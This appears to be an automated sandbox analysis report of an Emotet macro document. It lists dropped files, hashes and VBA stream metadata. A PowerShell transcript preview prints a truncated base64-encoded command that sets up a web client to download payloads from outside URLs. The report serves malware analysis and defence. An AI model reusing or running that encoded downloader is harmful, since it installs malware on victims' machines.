                                SSDEEP:1536:D8eNK7kZ7/yZR5XT/haVKMtsYND6SL+x1YOnGg5/0oOVk9:wer/yR5DpQKajNDu1C4
                                MD5:D348958F12C5265B18029D088A56CBDA
                                SHA1:E6C5F97EED5030B77A4FB275753CB01B561E4D70
                                SHA-256:ED95A92727676806D297A94A56D04ED0D8DA13FD3D5CD0AE7B060EB91A0F6B17
                                SHA-512:E73D13D71DDD62F4AEE8A915ADD4F17C6AA8B50B934FF01AE0DE9E08F7D2F00F4A490F287C05A369538AEDB591B886610DB44CD9ADEE4F4194306AC668FDE1CC
                                Malicious:false
                                Preview: ......JFIF.............C....................................................................C.......................................................................7...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......f.......K....2.y.=a$.I.[3H.m.,.I'..S]..2.._.'..........L.....~.......,u.U.r.z...E.C....^.k..D...."....(...^.k..D...."....+...4......?.....>.G......?.....>.G........]....../|5...}....Z....../|5...}....Z......G4....c....^.k..D...."....(...^.k..D...."....+...iw.g.............?.Ek...Q..........?.Ek...WwE..........{...............{..............9..=.;.'.2.._.'.
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F9A93AC9.dat
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 37 x 65536 x 0 +2 "\004"
                                Category:dropped
                                Size (bytes):430
                                Entropy (8bit):2.692616221939821
                                Encrypted:false
                                SSDEEP:6:MQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gwQ7/UssVWlsW6A6lsW6A8:MQe/yp058QYHahnzSNwDccAOcAWztl
                                MD5:F57A731751D6C07D989297189945DC22
                                SHA1:95B115EA32B4504EE3BC6B8BFF30DE68E3AF408B
                                SHA-256:48299988FF9C5D05502D33EC09A5D85E3CEAEE33254D3793C3DE0AF17294A31D
                                SHA-512:7E766A18CB2405D94FBB46D2FC56018349E5EB4229782C8D43E108EC1A115592BB4DE512AE1963226AEA78D5BE09BA6AAC37ACB6D1FF4F79AADB86CB559C13F1
                                Malicious:false
                                Preview: ............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..g..!..j...I.u@..u..f.....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\FB15D935.dat
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 37 x 65536 x 0 +2 "\004"
                                Category:dropped
                                Size (bytes):430
                                Entropy (8bit):2.704814157981301
                                Encrypted:false
                                SSDEEP:6:MQlA//ykK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gw6r4UssVWlsW6A6lsW6A8:MQe/yp058QYHahnzSNwUzccAOcAWztl
                                MD5:35428803E94ECDFA6A957382868444DA
                                SHA1:58E6C82DCF6938B0919FBC7F7BBA941EC0679834
                                SHA-256:73B03956B8DD27BFD4F7A828A7654456D6952E4C75AA03CF3F5050EEE366BCAE
                                SHA-512:7225E9A56E420850A5D1A0F9C8F3620F43E904C47C12E59D96D132CF14A026BAB9DEAE9941CF2FE1251D4D82F20026EFCA7BBDCE280B140494FE23F307086136
                                Malicious:false
                                Preview: ............%.........................................................-.........!...............-.........!..................................................................................@..Calibri.D..g.."..j...I.u@..u..f.....-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.........
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\FFEB2240.wmf
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:Targa image data - Map - RLE 65536 x 65536 x 0 "\004"
                                Category:dropped
                                Size (bytes):448
                                Entropy (8bit):2.4825641167881303
                                Encrypted:false
                                SSDEEP:6:2lzkK0Xgtql8S/Asl+1csl1sgtql5MzWnUaXS+gnE2hUssVWlsW6A6lsW6AWztuf:Ep058QYHahnzSNElccAOcAWztuQe/n
                                MD5:6F0B9884808CBEAFE647696DED386180
                                SHA1:0BD0325DAA5FD168F29F2EB267150A09A1C0BB34
                                SHA-256:78272E8365184909760959CB2C142783965D6F0CEC30816632336B47F31AD72F
                                SHA-512:1E5006F75679892069FF9629FE2A551969E021B8BA2E65ED4E8D878FBCE0B9A9042B4429E4696397CFFBE009EBB9DD3F3132C5C59A6908A031E0DDF57482087C
                                Malicious:false
                                Preview: ......................................................................-.........!...............-.........!..................................................................................@..Calibri..."u*;......f...............-.................-.........!...........%...@.................(...................................................%...@.................(.......................................................'.....................%.....
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{18B3A67A-A533-4BAB-8CBD-C7D2F8E5D5D8}.tmp
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):1536
                                Entropy (8bit):0.29703194588275483
                                Encrypted:false
                                SSDEEP:3:31lYdltn/lXlOclllqPxZlhQtChY9:g3Wc/4PxZUtr
                                MD5:51C5ED72EFA2B3EF40C435D4D2D66EF5
                                SHA1:827F9630177277AFE147BE87CAE57460B59B0B14
                                SHA-256:C30B09E4119A7AFFEC300FC7A5DD9D6A572688EA4B9B967948533BF62C504E27
                                SHA-512:9F4479597A598CBAFC2C28EE1C241779242D810B882955D6AB3B766546BC2F2A00606F4138A975F155B4C86A719F31C0B145CCB2C399B553B3EA644709604120
                                Malicious:false
                                Preview: ........................../.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{6C174BA0-18C1-486D-9BEC-1598745CF1D2}.tmp
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):2
                                Entropy (8bit):1.0
                                Encrypted:false
                                SSDEEP:3:j:j
                                MD5:63BBFFFD9D3B28533228896356733BC2
                                SHA1:974BB14506DAA8EED27240396BEDF6F88D18365F
                                SHA-256:5AECA385D8B781825B07BBEC7C858B7170426C88088935850BC13DD6402368A5
                                SHA-512:3CA380B9869439FAD14AF97D2FE80776038F3ECB8AFDBFC3B7863ABF4A467CB434DEC5A5CB5525DE55CBE56355A8DBBE9CA041E5EB30189A4BAE53CA98681837
                                Malicious:false
                                Preview: ..
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{9F90F187-8AD3-4713-9E28-81E7D2CB67F0}.tmp
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):1024
                                Entropy (8bit):0.05390218305374581
                                Encrypted:false
                                SSDEEP:3:ol3lYdn:4Wn
                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                Malicious:false
                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):0.9260988789684415
                                Encrypted:false
                                SSDEEP:3:Nlllulb/lj:NllUb/l
                                MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                Malicious:false
                                Preview: @...e................................................@..........
                                C:\Users\user\AppData\Local\Temp\Word8.0\MSForms.exd
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):189604
                                Entropy (8bit):4.324234164397461
                                Encrypted:false
                                SSDEEP:1536:1HNLiUlWWpFpKKHss0xLByQQ/oHTFm2omiURU7GbZtA/Q7hULkzlO:1tP8WpFpKKHNYLByQ1bSURUCULn
                                MD5:DE1D74D21D60639CAD879F5487BF3ED8
                                SHA1:B6C857EF622CC54B5907EEEFA740703666D58043
                                SHA-256:D547F220CECDE7635DDF32BCC15881FFD61AF524E4AB03188B5EFDE293F8AA28
                                SHA-512:D19BE5A0D91493CD0C625A88C6B49D65D216F2BFB30EDCC16E92CB646D41D4AE8EF37BCCD14C3A4B65829ABCB1B935CCB26160EBABE6411A4442128C6D42F2CB
                                Malicious:false
                                Preview: MSFT................Q...............................E$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................$................................................ ...............................x..lJ..............T........................................... ...................................................
                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qnil0oed.jkt.ps1
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview: 1
                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vpsldg3v.pfr.psm1
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Preview: 1
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\emotet.doc.LNK
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:42 2020, mtime=Fri Dec 4 17:57:05 2020, atime=Fri Dec 4 17:57:03 2020, length=118397, window=hide
                                Category:dropped
                                Size (bytes):2066
                                Entropy (8bit):4.686125568174253
                                Encrypted:false
                                SSDEEP:24:8kANDbheHAa5DcS7aB6mykANDbheHAa5DcS7aB6m:8kAFUgayDB6pkAFUgayDB6
                                MD5:9FD93EDF8A5920B59932194BA242A393
                                SHA1:AA663CB15119A8E7D977C7413440DEFACC53279E
                                SHA-256:5C6DE5B4BADD25E01EFFBA68071D707625FF5D22EFF7BA841197BD9859AB9B7C
                                SHA-512:95F09747F4F9D1E25D075DB41BAAD326DDCCC246858BE2534D04C35599E12B8AAA38355188878E0FA7C23B58D84C759F5DF22502E9244F1D797E64E68907DC12
                                Malicious:true
                                Preview: L..................F.... ......:... KnBo...8..@o...}............................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Q......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..Q.......S........................h.a.r.d.z.....~.1.....>Qxx..Desktop.h.......Ny..Q.......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....`.2.}....Q". .emotet.doc..F......>Qvx.Q".....h........................e.m.o.t.e.t...d.o.c.......P...............-.......O...........>.S......C:\Users\user\Desktop\emotet.doc..!.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.e.m.o.t.e.t...d.o.c.........:..,.LB.)...As...`.......X.......258555...........!a..%.H.VZAj...P..-.........-..!a..%.H.VZAj...P..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h...
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):68
                                Entropy (8bit):3.8889744306075613
                                Encrypted:false
                                SSDEEP:3:M14mmGLpzCYIbmGLpzCmX14mmGLpzCv:MGfGLpzNGLpzefGLpzs
                                MD5:8A3DA797C0EB563B5525282532E8538A
                                SHA1:660F3D14EEC0B360FE1BD72A7FC5B398F7266C10
                                SHA-256:302C6D9AB6DFCF8A499E5867E03DB1D96AE7234A3FEE5C6AC86275A8D1E66C93
                                SHA-512:F37C77E4B99C73A3B65140BDDF7E0F56783323729A96265E91820904B9EA46B58A36F435E3FBE02642701FC111B99FD480E2AF5772C7C0165757483D55369BB6
                                Malicious:false
                                Preview: [doc]..emotet.doc.LNK=0..emotet.doc.LNK=0..[doc]..emotet.doc.LNK=0..
                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):162
                                Entropy (8bit):2.2706270144817173
                                Encrypted:false
                                SSDEEP:3:Rl/ZdvUnrll9lqKiXD9lqKmW5r:RtZtUnxIEc
                                MD5:2F4079DEC79F6FE04350D238CA52F788
                                SHA1:9A5E2E50DAFB59B7F8084A8415001872CDAA260E
                                SHA-256:CA25BF7DC3F53F778E90DFFE017676C71EA0C5458A42389CE79032909E0FD0A1
                                SHA-512:A45CAA3074BBD677DBF27080DBB086A571209D548AB593E789653F2D915664848CFDF42EEAAF1F378FC1F9228059FFB2FCEB2E42AEB1276E8C95E819C4D389D4
                                Malicious:false
                                Preview: .pratesh................................................p.r.a.t.e.s.h..........q...9..........$.......6C.......q...:..........$.......6C.......q...;..........T...
                                C:\Users\user\Desktop\~$emotet.doc
                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):162
                                Entropy (8bit):2.2706270144817173
                                Encrypted:false
                                SSDEEP:3:Rl/ZdvUnrll9lqKiXD9lqKmW5r:RtZtUnxIEc
                                MD5:2F4079DEC79F6FE04350D238CA52F788
                                SHA1:9A5E2E50DAFB59B7F8084A8415001872CDAA260E
                                SHA-256:CA25BF7DC3F53F778E90DFFE017676C71EA0C5458A42389CE79032909E0FD0A1
                                SHA-512:A45CAA3074BBD677DBF27080DBB086A571209D548AB593E789653F2D915664848CFDF42EEAAF1F378FC1F9228059FFB2FCEB2E42AEB1276E8C95E819C4D389D4
                                Malicious:true
                                Preview: .pratesh................................................p.r.a.t.e.s.h..........q...9..........$.......6C.......q...:..........$.......6C.......q...;..........T...
                                C:\Users\user\Documents\20201204\PowerShell_transcript.258555.Xq7HteuE.20201204105711.txt
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                Category:dropped
                                Size (bytes):3443
                                Entropy (8bit):5.521702820255262
                                Encrypted:false
                                SSDEEP:96:BZChuNKtcKhkLGbIcE9PeUiqDo1ZuZbOyc8YHZU:UVFNqeIt
                                MD5:47CF471D376FBC75AD5DF732CBDCE536
                                SHA1:2C0450E5C88E7FCDE10D53B4253D0363D9557AE0
                                SHA-256:981B4D187F0B97989AB5BA10B519BB1CC856E7AFEE54FD6C164E440A7A0105E0
                                SHA-512:DF2DA33C83373BEC8DCBE4081084285286C4F9CA298BD59D9CF7A096AC708EF4EF97B441E2CDB0AC5648D7C8624D03B5DDE5C8591CFCEFC552B1898C0E6DCE18
                                Malicious:false
                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20201204105711..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 258555 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -enco JABqAHIARgBoAEEAMAA9ACcAVwBmADEAcgBIAHoAJwA7ACQAdQBVAE0ATQBMAEkAIAA9ACAAJwAyADgANAAnADsAJABpAEIAdABqADQAOQBOAD0AJwBUAGgATQBxAFcAOABzADAAJwA7ACQARgB3AGMAQQBKAHMANgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdQBVAE0ATQBMAEkAKwAnAC4AZQB4AGUAJwA7ACQAUwA5AEcAegBSAHMAdABNAD0AJwBFAEYAQwB3AG4AbABHAHoAJwA7ACQAdQA4AFUAQQByADMAPQAmACgAJwBuACcAKwAnAGUAdwAnACsAJwAtAG8AYgBqAGUAYwB0ACcAKQAgAE4AZQBUAC4AdwBFAEIAQwBsAEkARQBuAHQAOwAkAHAATABqAEIAcQBJAE4ARQA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAbwBjAGsAYwBoAGEAaQBuAGoAbwBiAGwAaQBzAHQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADAAMQA0ADAAOAAwAC8AQABoAHQAdABwAHMAOgAvAC8AdwBvAG0AZQBuAGUAbQBwAG8AdwBlAHIAbQBlAG4AdABwAGEAawBpAHMAdABhAG4ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHAAYQBiAGEANQBxADUAMg

                                Static File Info

                                General

                                File type:Microsoft Word 2007+
                                Entropy (8bit):7.750681294900762
                                TrID:
                                • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
                                • Word Microsoft Office Open XML Format document (49504/1) 32.35%
                                • Word Microsoft Office Open XML Format document (43504/1) 28.43%
                                • ZIP compressed archive (8000/1) 5.23%
                                File name:emotet.doc
                                File size:143202
                                MD5:b92021ca10aed3046fc3be5ac1c2a094
                                SHA1:0fb1ad5b53cdd09a7268c823ec796a6e623f086f
                                SHA256:c378387344e0a552dc065de6bfa607fd26e0b5c569751c79fbf9c6f2e91c9807
                                SHA512:bbeb5cfd7c5a890456b0805234a9ae325abc4a08dbad70b4ed1b3635dee4470a1f86869d5532809cecb595b9a89708f378921d733bd061aef693bfc5ee77ebb4
                                SSDEEP:3072:/Msknok2er/yR5DpQKajNDu1CkBwN0pqJfWSq:zkoRoKDpQZqQkmN0scR
                                File Content Preview:PK..........!.G.z$....c.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                File Icon

                                Icon Hash:74f4c4c6c1cac4d8

                                Static OLE Info

                                General

                                Document Type:OpenXML
                                Number of OLE Files:13

                                OLE File "/opt/package/joesandbox/database/analysis/326849/sample/emotet.doc"

                                Indicators

                                Has Summary Info:False
                                Application Name:unknown
                                Encrypted Document:False
                                Contains Word Document Stream:
                                Contains Workbook/Book Stream:
                                Contains PowerPoint Document Stream:
                                Contains Visio Document Stream:
                                Contains ObjectPool Stream:
                                Flash Objects Count:
                                Contains VBA Macros:True

                                Summary

                                Title:
                                Subject:
                                Author:
                                Keywords:
                                Template:Normal.dotm
                                Last Saved By:
                                Revion Number:1
                                Total Edit Time:0
                                Create Time:2019-09-16T12:22:00Z
                                Last Saved Time:2019-09-16T12:22:00Z
                                Number of Pages:1
                                Number of Words:66
                                Number of Characters:380
                                Creating Application:Microsoft Office Word
                                Security:0

                                Document Summary

                                Number of Lines:3
                                Number of Paragraphs:1
                                Thumbnail Scaling Desired:false
                                Company:
                                Contains Dirty Links:false
                                Shared Document:false
                                Changed Hyperlinks:false
                                Application Version:16.0000

                                Streams with VBA

                                VBA File Name: BdOW1qt.bas, Stream Size: 675
                                General
                                Stream Path:VBA/BdOW1qt
                                VBA File Name:BdOW1qt.bas
                                Stream Size:675
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . w . . . . . . . . . . . a / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 77 02 00 00 00 00 00 00 01 00 00 00 61 2f 1f 0d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                VBA Code Keywords

                                Keyword
                                Attribute
                                VB_Name
                                VBA Code
                                Attribute VB_Name = "BdOW1qt"
                                VBA File Name: EELFLr.bas, Stream Size: 674
                                General
                                Stream Path:VBA/EELFLr
                                VBA File Name:EELFLr.bas
                                Stream Size:674
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . w . . . . . . . . . . . a / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 77 02 00 00 00 00 00 00 01 00 00 00 61 2f d1 13 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                VBA Code Keywords

                                Keyword
                                Attribute
                                "EELFLr"
                                VB_Name
                                VBA Code
                                Attribute VB_Name = "EELFLr"
                                VBA File Name: EIBYN39s.bas, Stream Size: 677
                                General
                                Stream Path:VBA/EIBYN39s
                                VBA File Name:EIBYN39s.bas
                                Stream Size:677
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . w . . . . . . . . . . . a / . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 77 02 00 00 00 00 00 00 01 00 00 00 61 2f d1 68 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                VBA Code Keywords

                                Keyword
                                Attribute
                                VB_Name
                                VBA Code
                                Attribute VB_Name = "EIBYN39s"
                                VBA File Name: S9zlQCC.cls, Stream Size: 986
                                General
                                Stream Path:VBA/S9zlQCC
                                VBA File Name:S9zlQCC.cls
                                Stream Size:986
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a / . v . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 61 2f 83 76 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                VBA Code Keywords

                                Keyword
                                False
                                VB_Exposed
                                Attribute
                                VB_Name
                                VB_Creatable
                                VB_PredeclaredId
                                VB_GlobalNameSpace
                                VB_Base
                                VB_Customizable
                                VB_TemplateDerived
                                VBA Code
                                Attribute VB_Name = "S9zlQCC"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
                                VBA File Name: ThisDocument.cls, Stream Size: 2640
                                General
                                Stream Path:VBA/ThisDocument
                                VBA File Name:ThisDocument.cls
                                Stream Size:2640
                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . . . . . . . . . . . . . a / . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . . . ' . . N . K . . 4 R . O < @ : . . I . G . . D . . ^ . . . . . . . . . . . . . . . . . . . . . . a . . . p b . G . . . Y . U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . $ . C v K R t Z M , 0 , 0 , M S F o r m s , O p t i o n B u t t o n # . I w 5 R 1 M , 1 , 1 , M S F o r m s , O p
                                Data Raw:01 16 01 00 06 cb 02 00 00 99 07 00 00 af 02 00 00 dd 03 00 00 e0 07 00 00 7e 08 00 00 d2 08 00 00 00 00 00 00 01 00 00 00 61 2f 88 04 00 00 ff ff e3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 9c 00 ff ff 00 00 5d d9 c0 fd 27 aa 2e 4e 87 4b d4 c2 34 52 e1 4f 3c 40 3a b1 87 49 b3 47 99 80 44 83 d4 5e 84 cc 00 00 00 00 00 00 00 00 00 00 00 00 00

                                VBA Code Keywords

                                Keyword
                                OptionButton"
                                VB_Name
                                VB_Creatable
                                VB_Exposed
                                "rFuFtC,
                                VB_Customizable
                                "nEKQItFh,
                                "ThisDocument"
                                "pBDzuJEX,
                                VB_Control
                                "YWLoCv,
                                VB_TemplateDerived
                                "IjuWPtT,
                                MSForms,
                                False
                                Attribute
                                "CvKRtZM,
                                VB_PredeclaredId
                                VB_GlobalNameSpace
                                VB_Base
                                VBA Code
                                Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CvKRtZM, 0, 0, MSForms, OptionButton"
Attribute VB_Control = "Iw5R1M, 1, 1, MSForms, OptionButton"
Attribute VB_Control = "hjL90Njk, 2, 2, MSForms, OptionButton"
Attribute VB_Control = "nEKQItFh, 3, 3, MSForms, OptionButton"
Attribute VB_Control = "Mdw60aL, 4, 4, MSForms, OptionButton"
Attribute VB_Control = "psYO9m, 5, 5, MSForms, OptionButton"
Attribute VB_Control = "pBDzuJEX, 6, 6, MSForms, OptionButton"
Attribute VB_Control = "rFuFtC, 7, 7, MSForms, OptionButton"
